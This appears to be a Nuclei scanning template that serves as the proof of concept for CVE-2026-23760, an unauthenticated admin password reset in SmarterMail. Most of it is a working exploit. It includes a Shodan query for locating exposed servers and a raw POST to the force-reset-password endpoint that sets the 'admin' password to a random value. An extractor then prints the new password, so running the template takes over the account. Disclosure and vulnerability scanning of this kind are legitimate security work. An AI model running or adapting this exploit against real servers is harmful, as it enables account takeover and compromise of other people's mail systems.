Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
PoC
id: CVE-2026-23760
info:
name: SmarterTools SmarterMail - Admin Password Reset
author: watchTowr,DhiyaneshDk
severity: critical
description: |
Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
impact: |
Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
remediation: |
Upgrade to build 9511 or later.
reference:
- https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
metadata:
verified: true
max-request: 1
shodan-query: html:"SmarterMail"
tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev,vuln
variables:
password: "{{rand_text_alphanumeric(12)}}"
http:
- raw:
- |
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"{{password}}",
"ConfirmPassword": "{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- 'debugInfo'
condition: and
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"New Password: " + password'
# digest: 4b0a004830460221008ca8dc2972b90c7a0a4e70637d962755ce5c8c96aa9cc6b8d3479f2dfa17499b022100aa2bf5a5357ff83f5e4df8bd47d8f410a9cd51a66269c4920b25dbcc56199228:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.